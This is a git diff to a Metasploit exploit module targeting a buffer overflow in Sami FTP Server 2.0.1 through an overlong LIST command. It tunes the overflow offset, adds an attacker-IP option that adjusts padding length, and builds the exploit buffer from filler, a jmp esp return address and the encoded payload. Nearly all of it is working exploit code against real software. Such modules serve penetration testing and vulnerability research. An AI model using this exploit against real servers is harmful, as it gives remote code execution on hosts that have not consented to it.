diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 5f501c96e2..52b8d9f12f 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow', 'Description' => %q{ A buffer overflow is triggered when a long LIST - command is sent to the server and the user views the Log tab. + command is sent to the server while the user is viewing the Logs tab. }, 'Platform' => 'win', 'Author' => @@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote 'Windows Universal', { 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll - 'Offset' => 219, + 'Offset' => 225, }, ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 27 2013')) + register_options( + [ + OptString.new('IPADDR', [true, 'Attacker\'s IP address']) + ], self.class) end def exploit connect_login - - buf = rand_text(target['Offset'], payload_badchars) + sleep 1 + + ip_length = datastore['IPADDR'].length - 3 + buf = rand_text_alphanumeric(target['Offset'] - ip_length) buf << [ target['Ret'] ].pack('V') buf << payload.encoded